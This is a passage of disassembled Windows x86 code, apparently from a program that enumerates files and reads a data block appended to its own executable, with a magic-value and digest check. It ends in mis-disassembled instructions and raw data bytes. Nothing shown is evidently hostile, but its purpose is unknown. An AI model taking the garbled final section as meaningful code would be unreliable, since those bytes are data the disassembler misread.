mov ecx, [ebp+var_54]
push ecx
call ds:dword_4E67C8 ;; CharUpperBuffA
mov [ebp+var_1A8], 0
mov [ebp+var_4], 1
push 0
push 1
mov edx, [ebp+var_44]
push edx
call sub_4D8610
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_4D838F
; ---------------------------------------------------------------------------
loc_4D8354: ; DATA XREF: _5:004E3418�o
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1E8]
mov [ebp+var_1A8], eax
mov ecx, [ebp+var_1A8]
and ecx, 0EF000000h
xor eax, eax
cmp ecx, 0EF000000h
setz al
retn
; ---------------------------------------------------------------------------
loc_4D8385: ; DATA XREF: _5:004E341C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_4D838F: ; CODE XREF: sub_4D7DD0+4FB�j
; sub_4D7DD0+514�j ...
lea edx, [ebp+var_19C]
push edx
mov eax, [ebp+var_1A4]
push eax
call ds:dword_4E66D4 ;; FindNextFileA
test eax, eax
jnz loc_4D82C0
mov ecx, [ebp+var_1A4]
push ecx
call ds:dword_4E66CC ;; FindClose
loc_4D83B8: ; CODE XREF: sub_4D7DD0+4EA�j
; sub_4D7DD0+5FB�j
mov edx, [ebp+var_58]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_4D83CD
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
jmp short loc_4D83B8
; ---------------------------------------------------------------------------
loc_4D83CD: ; CODE XREF: sub_4D7DD0+5F0�j
mov edx, [ebp+var_58]
add edx, 1
mov [ebp+var_58], edx
jmp loc_4D8264
; ---------------------------------------------------------------------------
loc_4D83DB: ; CODE XREF: sub_4D7DD0+3D6�j
; sub_4D7DD0+4A3�j
mov eax, [ebp+var_44]
mov [ebp+var_1BC], eax
mov ecx, [ebp+var_1BC]
push ecx
call sub_4DD3DD
add esp, 4
call sub_4D9490
push 10040h
call sub_4DD35A
add esp, 4
mov [ebp+var_1C0], eax
mov edx, [ebp+var_1C0]
mov ds:dword_4E68F8, edx
push 10000h
call sub_4DD35A
add esp, 4
mov [ebp+var_1C4], eax
mov eax, [ebp+var_1C4]
mov ds:dword_4E68FC, eax
push 10000h
call sub_4DD35A
add esp, 4
mov [ebp+var_1C8], eax
mov ecx, [ebp+var_1C8]
mov ds:dword_4E6900, ecx
push 10000h
call sub_4DD35A
add esp, 4
mov [ebp+var_1CC], eax
mov edx, [ebp+var_1CC]
mov ds:dword_4E6904, edx
push 28h
call sub_4DD35A
add esp, 4
mov [ebp+var_1D0], eax
cmp [ebp+var_1D0], 0
jz short loc_4D84A4
push 83h
mov ecx, [ebp+var_1D0]
call sub_4E077C
mov [ebp+var_1EC], eax
jmp short loc_4D84AE
; ---------------------------------------------------------------------------
loc_4D84A4: ; CODE XREF: sub_4D7DD0+6BA�j
mov [ebp+var_1EC], 0
loc_4D84AE: ; CODE XREF: sub_4D7DD0+6D2�j
mov eax, [ebp+var_1EC]
mov ds:dword_4E68E4, eax
push 28h
call sub_4DD35A
add esp, 4
mov [ebp+var_1D4], eax
cmp [ebp+var_1D4], 0
jz short loc_4D84EA
push 83h
mov ecx, [ebp+var_1D4]
call sub_4E077C
mov [ebp+var_1F0], eax
jmp short loc_4D84F4
; ---------------------------------------------------------------------------
loc_4D84EA: ; CODE XREF: sub_4D7DD0+700�j
mov [ebp+var_1F0], 0
loc_4D84F4: ; CODE XREF: sub_4D7DD0+718�j
mov ecx, [ebp+var_1F0]
mov ds:dword_4E68E8, ecx
push 28h
call sub_4DD35A
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0
jz short loc_4D8531
push 83h
mov ecx, [ebp+var_1D8]
call sub_4E077C
mov [ebp+var_1F4], eax
jmp short loc_4D853B
; ---------------------------------------------------------------------------
loc_4D8531: ; CODE XREF: sub_4D7DD0+747�j
mov [ebp+var_1F4], 0
loc_4D853B: ; CODE XREF: sub_4D7DD0+75F�j
mov edx, [ebp+var_1F4]
mov ds:dword_4E68E0, edx
push 28h
call sub_4DD35A
add esp, 4
mov [ebp+var_1DC], eax
cmp [ebp+var_1DC], 0
jz short loc_4D8578
push 83h
mov ecx, [ebp+var_1DC]
call sub_4E077C
mov [ebp+var_1F8], eax
jmp short loc_4D8582
; ---------------------------------------------------------------------------
loc_4D8578: ; CODE XREF: sub_4D7DD0+78E�j
mov [ebp+var_1F8], 0
loc_4D8582: ; CODE XREF: sub_4D7DD0+7A6�j
mov eax, [ebp+var_1F8]
mov ds:dword_4E68EC, eax
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D85A2
jmp short loc_4D85F3
sub_4D7DD0 endp
; =============== S U B R O U T I N E =======================================
sub_4D85A2 proc near ; CODE XREF: sub_4D7DD0+7CB�p
; DATA XREF: _5:004E3410�o
mov ecx, [ebp-1Ch]
mov [ebp-1E0h], ecx
mov edx, [ebp-1E0h]
push edx
call sub_4DD3DD
add esp, 4
cmp dword ptr [ebp-20h], 0
jz short loc_4D85E2
mov ds:dword_4E6908, 0
mov eax, [ebp-20h]
mov [ebp-1E4h], eax
mov ecx, [ebp-1E4h]
push ecx
call sub_4DD3DD
add esp, 4
loc_4D85E2: ; CODE XREF: sub_4D85A2+1C�j
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short locret_4D85F2
mov edx, [ebp-24h]
push edx
call ds:dword_4E66A4 ;; CloseHandle
locret_4D85F2: ; CODE XREF: sub_4D85A2+44�j
retn
sub_4D85A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D7DD0
loc_4D85F3: ; CODE XREF: sub_4D7DD0+7D0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D7DD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8610 proc near ; CODE XREF: sub_4D7DD0+368�p
; sub_4D7DD0+573�p
var_308 = dword ptr -308h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_C4 = byte ptr -0C4h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A0 = byte ptr -0A0h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3420
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFCE0h
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_1C], ecx
mov [ebp+var_28], 0FFFFFFFFh
mov [ebp+var_24], 0
mov [ebp+var_4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E66A8 ;; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4D8690
mov ecx, 0EF000005h
call sub_4DD342
loc_4D8690: ; CODE XREF: sub_4D8610+74�j
push 0
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E6700 ;; GetFileSize
mov [ebp+var_54], eax
mov [ebp+var_78], 0
mov edx, [ebp+arg_8]
and edx, 0FFh
test edx, edx
jz loc_4D892F
mov eax, ds:dword_4E6684
mov ecx, [eax+24h]
and ecx, 2
test ecx, ecx
jnz loc_4D892F
mov edx, ds:dword_4E6684
mov eax, [edx+4]
mov [ebp+var_88], eax
mov ecx, [ebp+var_88]
mov edx, [ebp+var_88]
add edx, [ecx+3Ch]
mov ds:dword_4E6910, edx
mov eax, ds:dword_4E6910
cmp dword ptr [eax], 4550h
jz short loc_4D8705
mov ecx, 0EF000002h
call sub_4DD342
loc_4D8705: ; CODE XREF: sub_4D8610+E9�j
mov ecx, ds:dword_4E6910
xor edx, edx
mov dx, [ecx+14h]
mov eax, ds:dword_4E6910
lea ecx, [eax+edx+18h]
mov [ebp+var_84], ecx
mov edx, ds:dword_4E6910
add edx, 98h
mov [ebp+var_7C], edx
mov [ebp+var_8C], 0
mov eax, ds:dword_4E6910
xor ecx, ecx
mov cx, [eax+6]
mov [ebp+var_80], ecx
jmp short loc_4D8752
; ---------------------------------------------------------------------------
loc_4D8749: ; CODE XREF: sub_4D8610:loc_4D8782�j
mov edx, [ebp+var_80]
sub edx, 1
mov [ebp+var_80], edx
loc_4D8752: ; CODE XREF: sub_4D8610+137�j
cmp [ebp+var_80], 0
jl loc_4D8893
mov eax, [ebp+var_80]
imul eax, 28h
mov ecx, [ebp+var_84]
cmp dword ptr [ecx+eax+10h], 0
jz short loc_4D8782
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
cmp dword ptr [eax+edx+14h], 0
jnz short loc_4D8784
loc_4D8782: ; CODE XREF: sub_4D8610+15D�j
jmp short loc_4D8749
; ---------------------------------------------------------------------------
loc_4D8784: ; CODE XREF: sub_4D8610+170�j
mov ecx, [ebp+var_80]
imul ecx, 28h
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
mov edx, [eax+edx+10h]
mov eax, ds:dword_4E6910
mov eax, [eax+3Ch]
lea edx, [edx+eax-1]
mov eax, ds:dword_4E6910
mov eax, [eax+3Ch]
sub eax, 1
not eax
and edx, eax
mov eax, [ebp+var_84]
mov ecx, [eax+ecx+14h]
add ecx, edx
mov [ebp+var_8C], ecx
push 0
push 0
mov edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_B4], eax
push 0
lea ecx, [ebp+var_90]
push ecx
push 20h
lea edx, [ebp+var_B0]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz loc_4D8893
cmp [ebp+var_90], 20h
jnz loc_4D8893
lea ecx, [ebp+var_130]
call sub_4DC798
push 10h
lea ecx, [ebp+var_B0]
push ecx
lea ecx, [ebp+var_130]
call sub_4DC7A4
lea edx, [ebp+var_C4]
push edx
lea ecx, [ebp+var_130]
call sub_4DC85D
mov ecx, 4
lea edi, [ebp+var_A0]
lea esi, [ebp+var_C4]
xor eax, eax
repe cmpsd
jnz short loc_4D8893
mov ecx, [ebp+var_8C]
add ecx, [ebp+var_B0]
mov [ebp+var_78], ecx
push 2
push 0
push 0
mov edx, [ebp+var_28]
push edx
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_134], eax
mov eax, [ebp+var_134]
sub eax, [ebp+var_78]
neg eax
mov [ebp+var_78], eax
jmp loc_4D892F
; ---------------------------------------------------------------------------
loc_4D8893: ; CODE XREF: sub_4D8610+146�j
; sub_4D8610+1F0�j ...
mov ecx, [ebp+var_7C]
cmp dword ptr [ecx], 0
jz loc_4D892F
mov edx, [ebp+var_7C]
cmp dword ptr [edx+4], 0
jz loc_4D892F
mov eax, [ebp+var_7C]
mov ecx, [ebp+var_54]
sub ecx, [eax]
neg ecx
mov [ebp+var_78], ecx
mov edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_54], eax
mov [ebp+var_138], 0
loc_4D88CB: ; CODE XREF: sub_4D8610+31D�j
push 2
push 0
mov ecx, [ebp+var_78]
sub ecx, 1
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_140], eax
push 0
lea eax, [ebp+var_13C]
push eax
push 1
lea ecx, [ebp+var_138]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E677C ;; ReadFile
test eax, eax
jnz short loc_4D8910
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8910: ; CODE XREF: sub_4D8610+2F4�j
cmp [ebp+var_138], 0
jz short loc_4D891B
jmp short loc_4D892F
; ---------------------------------------------------------------------------
loc_4D891B: ; CODE XREF: sub_4D8610+307�j
mov eax, [ebp+var_78]
sub eax, 1
mov [ebp+var_78], eax
mov ecx, [ebp+var_54]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_4D88CB
; ---------------------------------------------------------------------------
loc_4D892F: ; CODE XREF: sub_4D8610+A1�j
; sub_4D8610+B4�j ...
push 2
push 0
mov edx, [ebp+var_78]
sub edx, 4
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_74], eax
mov ecx, [ebp+var_54]
add ecx, [ebp+var_78]
mov [ebp+var_54], ecx
mov [ebp+var_144], 0
push 0
lea edx, [ebp+var_144]
push edx
push 4
lea eax, [ebp+var_148]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8983
cmp [ebp+var_144], 4
jz short loc_4D898D
loc_4D8983: ; CODE XREF: sub_4D8610+368�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D898D: ; CODE XREF: sub_4D8610+371�j
cmp [ebp+var_148], 0CAFEBABEh
jz short loc_4D89B0
mov edx, [ebp+var_148]
xor edx, 0CAFEBABEh
xor edx, [ebp+var_54]
mov [ebp+var_308], edx
jmp short loc_4D89BB
; ---------------------------------------------------------------------------
loc_4D89B0: ; CODE XREF: sub_4D8610+387�j
mov eax, ds:dword_4E5BD8
mov [ebp+var_308], eax
loc_4D89BB: ; CODE XREF: sub_4D8610+39E�j
mov ecx, [ebp+var_308]
mov [ebp+var_14C], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_4D89EF
mov eax, offset dword_4E5BD8
lea ecx, [ebp+var_14C]
mov edx, [ecx]
cmp edx, [eax]
jz short loc_4D89EF
mov ecx, 0EF000007h
call sub_4DD342
loc_4D89EF: ; CODE XREF: sub_4D8610+3C2�j
; sub_4D8610+3D3�j
push 2
push 0
mov eax, [ebp+var_78]
sub eax, 14h
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_150], 0
push 0
lea edx, [ebp+var_150]
push edx
push 10h
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8A34
cmp [ebp+var_150], 10h
jz short loc_4D8A3E
loc_4D8A34: ; CODE XREF: sub_4D8610+419�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8A3E: ; CODE XREF: sub_4D8610+422�j
mov edx, [ebp+arg_8]
and edx, 0FFh
neg edx
sbb edx, edx
and edx, 0Ch
mov [ebp+var_68], edx
push 2
push 0
mov eax, [ebp+var_68]
add eax, 2Ch
mov ecx, [ebp+var_78]
sub ecx, eax
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E6788 ;; SetFilePointer
mov [ebp+var_154], 0
mov eax, [ebp+arg_8]
and eax, 0FFh
test eax, eax
jz loc_4D8B15
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8AAB
cmp [ebp+var_154], 4
jz short loc_4D8AB5
loc_4D8AAB: ; CODE XREF: sub_4D8610+490�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8AB5: ; CODE XREF: sub_4D8610+499�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8ADB
cmp [ebp+var_154], 4
jz short loc_4D8AE5
loc_4D8ADB: ; CODE XREF: sub_4D8610+4C0�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8AE5: ; CODE XREF: sub_4D8610+4C9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8B0B
cmp [ebp+var_154], 4
jz short loc_4D8B15
loc_4D8B0B: ; CODE XREF: sub_4D8610+4F0�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8B15: ; CODE XREF: sub_4D8610+46F�j
; sub_4D8610+4F9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_60]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8B3B
cmp [ebp+var_154], 4
jz short loc_4D8B45
loc_4D8B3B: ; CODE XREF: sub_4D8610+520�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8B45: ; CODE XREF: sub_4D8610+529�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_70]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8B6B
cmp [ebp+var_154], 4
jz short loc_4D8B75
loc_4D8B6B: ; CODE XREF: sub_4D8610+550�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8B75: ; CODE XREF: sub_4D8610+559�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8B9B
cmp [ebp+var_154], 4
jz short loc_4D8BA5
loc_4D8B9B: ; CODE XREF: sub_4D8610+580�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8BA5: ; CODE XREF: sub_4D8610+589�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_64]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8BCB
cmp [ebp+var_154], 4
jz short loc_4D8BD5
loc_4D8BCB: ; CODE XREF: sub_4D8610+5B0�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8BD5: ; CODE XREF: sub_4D8610+5B9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_6C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8BFB
cmp [ebp+var_154], 4
jz short loc_4D8C05
loc_4D8BFB: ; CODE XREF: sub_4D8610+5E0�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8C05: ; CODE XREF: sub_4D8610+5E9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_58]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E677C ;; ReadFile
test eax, eax
jz short loc_4D8C2B
cmp [ebp+var_154], 4
jz short loc_4D8C35
loc_4D8C2B: ; CODE XREF: sub_4D8610+610�j
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8C35: ; CODE XREF: sub_4D8610+619�j
mov ecx, [ebp+arg_8]
and ecx, 0FFh
test ecx, ecx
jz loc_4D8E52
cmp [ebp+var_50], 0
jz loc_4D8E52
cmp [ebp+var_34], 0
jz loc_4D8E52
push 24h
call sub_4DD35A
add esp, 4
mov [ebp+var_2D8], eax
mov edx, [ebp+var_2D8]
mov [ebp+var_158], edx
mov eax, [ebp+var_1C]
add eax, 1
push eax
call sub_4DD35A
add esp, 4
mov [ebp+var_2DC], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2DC]
mov [ecx+0Ch], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov esi, [ebp+arg_0]
mov eax, [ebp+var_158]
mov edi, [eax+0Ch]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_158]
mov dword ptr [eax], 0
push 10h
call sub_4DD35A
add esp, 4
mov [ebp+var_2E0], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2E0]
mov [ecx+4], edx
push 4
call sub_4DD35A
add esp, 4
mov [ebp+var_2E4], eax
mov eax, [ebp+var_158]
mov ecx, [ebp+var_2E4]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_158]
mov dword ptr [eax+14h], 0
push 0
push 0
mov ecx, [ebp+var_158]
add ecx, 1Ch
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E6704 ;; GetFileTime
mov edi, ds:dword_4E690C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, ds:dword_4E6908
sub ecx, [eax+0C14h]
mov [ebp+var_15C], ecx
mov ecx, [ebp+var_15C]
add ecx, 1
push ecx
call sub_4DD35A
add esp, 4
mov [ebp+var_2E8], eax
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_2E8]
mov [eax], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_158]
mov edx, [ecx+8]
mov eax, [eax]
mov [edx], eax
mov ecx, [ebp+var_15C]
add ecx, 1
mov edx, ds:dword_4E6908
mov esi, ds:dword_4E690C
add esi, [edx+0C14h]
mov eax, [ebp+var_158]
mov edx, [eax+8]
mov edi, [edx]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_15C]
push ecx
mov edx, [ebp+var_158]
mov eax, [edx+8]
mov ecx, [eax]
push ecx
call ds:dword_4E67C8 ;; CharUpperBuffA
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov [eax+4], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_50]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov [eax+0Ch], ecx
mov edx, ds:dword_4E6908
mov [ebp+var_160], edx
mov eax, [ebp+var_158]
mov ecx, [ebp+var_160]
mov edx, [ecx]
mov [eax+10h], edx
mov eax, [ebp+var_160]
mov ecx, [ebp+var_158]
mov [eax], ecx
mov edx, ds:dword_4E6908
mov eax, [edx+4]
add eax, 1
mov ecx, ds:dword_4E6908
mov [ecx+4], eax
loc_4D8E52: ; CODE XREF: sub_4D8610+630�j
; sub_4D8610+63A�j ...
mov edx, [ebp+var_54]
sub edx, [ebp+var_58]
mov [ebp+var_58], edx
mov eax, [ebp+var_3C]
add eax, [ebp+var_58]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_54]
sub ecx, [ebp+var_3C]
test ecx, ecx
jb short loc_4D8E79
mov edx, [ebp+var_54]
sub edx, [ebp+var_3C]
cmp [ebp+var_60], edx
jbe short loc_4D8E83
loc_4D8E79: ; CODE XREF: sub_4D8610+85C�j
mov ecx, 0EF000007h
call sub_4DD342
loc_4D8E83: ; CODE XREF: sub_4D8610+867�j
mov eax, [ebp+var_60]
push eax
call sub_4DD35A
add esp, 4
mov [ebp+var_2EC], eax
mov ecx, [ebp+var_2EC]
mov [ebp+var_24], ecx
mov [ebp+var_234], 0
mov [ebp+var_238], 0
push 0
push 0
mov edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E6788 ;; SetFilePointer
loc_4D8EC4: ; CODE XREF: sub_4D8610+90A�j
mov ecx, [ebp+var_238]
cmp ecx, [ebp+var_60]
jz short loc_4D8F1C
mov [ebp+var_234], 0
push 0
lea edx, [ebp+var_234]
push edx
mov eax, [ebp+var_60]
sub eax, [ebp+var_238]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E677C ;; ReadFile
test eax, eax
jnz short loc_4D8F08
mov ecx, 0EF000006h
call sub_4DD342
loc_4D8F08: ; CODE XREF: sub_4D8610+8EC�j
mov eax, [ebp+var_238]
add eax, [ebp+var_234]
mov [ebp+var_238], eax
jmp short loc_4D8EC4
; ---------------------------------------------------------------------------
loc_4D8F1C: ; CODE XREF: sub_4D8610+8BD�j
push 120000h
call sub_4D2B7E
fxch4 st(2)
push esp
mov ebp, 46EE4704h
fst st
iret
sub_4D8610 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0F5h, 0E9h, 1Eh
dd 0D5E28C45h, 8C62D4A7h, 7CF0AAEEh, 88DF283Eh, 0D6A56BD3h
dd 7F01D584h, 9F85C5B6h, 0E7618390h, 0A2424F41h, 0FED9E4FEh
dd 0CDB905E3h, 55C9DCC0h, 0EF5F05A1h, 6E843F49h, 52F6001Ah
dd 67F55184h, 978DDDCEh, 1D797B88h, 0BA3A4746h, 6F9ECF7h
dd 0C5B6D5FBh, 339090B8h, 75D285D2h, 4C8D8DEEh, 0E8FFFFFDh
dd 37FCh, 50A0458Bh, 51DC4D8Bh, 0FD4C8D8Dh, 0F5E8FFFFh
dd 8D000037h, 0FFFDB895h, 8D8D52FFh, 0FFFFFD4Ch, 389CE8h
dd 4B900h, 0BD8D0000h, 0FFFFFDB8h, 33B4758Dh, 74A7F3C0h
dd 7B90Ah, 63E8EF00h, 6A000043h, 4374E824h, 0C4830000h
dd 10858904h, 8BFFFFFDh, 0FFFD108Dh, 0E04D89FFh, 83E4558Bh
dd 0E85201C2h, 4356h, 8904C483h, 0FFFD0C85h, 0E0458BFFh
dd 0FD0C8D8Bh, 4889FFFFh, 0E44D8B0Ch, 8B01C183h, 558B0875h
dd 0C7A8BE0h, 0E9C1C18Bh, 8BA5F302h, 3E183C8h, 4D8BA4F3h
dd 0DC558BE0h, 458B1189h, 9C4503DCh, 89E04D8Bh, 558B0441h
dd 2E2C194h, 4304E852h, 0C4830000h, 8858904h, 8BFFFFFDh
dd 8D8BE045h, 0FFFFFD08h, 8B084889h, 458BE055h, 18428994h
dd 0C7E04D8Bh, 1441h, 558D0000h, 458D52D0h, 4D8B50D0h
dd 1CC183E0h, 0D8558B51h, 415FF52h, 8B004E67h, 7883E045h
dd 16750020h, 83E04D8Bh, 75001C79h, 0E0558B0Dh, 521CC283h
dd 672C15FFh, 45C7004Eh, 0A4h, 8B09EB00h, 0C083A445h, 0A4458901h
dd 3BA44D8Bh, 830F944Dh, 0E3h, 0C1A4558Bh, 458B04E2h, 4488BE0h
dd 3DC458Bh, 4D8B1104h, 4E1C1A4h, 8BE0558Bh, 4890452h
dd 0A4458B0Ah, 8B04E0C1h, 518BE04Dh, 23C8B04h, 33FFC983h
dd 0F7AEF2C0h, 0FFC183D1h, 0FD488D89h, 858BFFFFh, 0FFFFFD48h
dd 5001C083h, 4235E8h, 4C48300h, 0FD048589h, 4D8BFFFFh
dd 8518BE0h, 8BA4458Bh, 0FFFD048Dh, 820C89FFh, 0FD488D8Bh
dd 0C183FFFFh, 0A4558B01h, 8B04E2C1h, 408BE045h, 10348B04h
dd 8BE0558Bh, 558B0842h, 903C8BA4h, 0E9C1C18Bh, 8BA5F302h
dd 3E183C8h, 8D8BA4F3h, 0FFFFFD48h, 0A4558B51h, 8B04E2C1h
dd 488BE045h, 11148B04h, 0C815FF52h, 8B004E67h, 0E0C1A445h
dd 0E04D8B04h, 8B04518Bh, 3040244h, 4D8BA845h, 4E1C1A4h
dd 8BE0558Bh, 44890452h, 8E9040Ah, 8BFFFFFFh, 4503DC45h
dd 0FC7881A0h, 0FEFEFEFEh, 0A7850Fh, 4D8B0000h, 0A04D03DCh
dd 89F8518Bh, 0FFFD3C95h, 0DC458BFFh, 8BA04503h, 8D89F448h
dd 0FFFFFD40h, 3DC558Bh, 0FFFD4095h, 449589FFh, 0C7FFFFFDh
dd 0FFFD3885h, 0FFh, 8B0FEB00h, 0FFFD3885h, 1C083FFh, 0FD388589h
dd 8D8BFFFFh, 0FFFFFD38h, 0FD3C8D3Bh, 3A73FFFFh, 0FD38958Bh
dd 0D26BFFFFh, 44858B18h, 3FFFFFDh, 348589C2h, 8BFFFFFDh
dd 0FFFD348Dh, 0DC558BFFh, 8B105103h, 0FFFD3485h, 105089FFh
dd 0FD348D8Bh, 8D89FFFFh, 0FFFFFD30h, 958BA9EBh, 0FFFFFD44h
dd 68F01589h, 858B004Eh, 0FFFFFD3Ch, 4E68F4A3h, 80D8B00h
dd 89004E69h, 0FFFD2C8Dh, 2C958BFFh, 83FFFFFDh, 840F003Ah
dd 152h, 8908458Bh, 0FFFCF485h, 2C8D8BFFh, 8BFFFFFDh, 0C428B11h
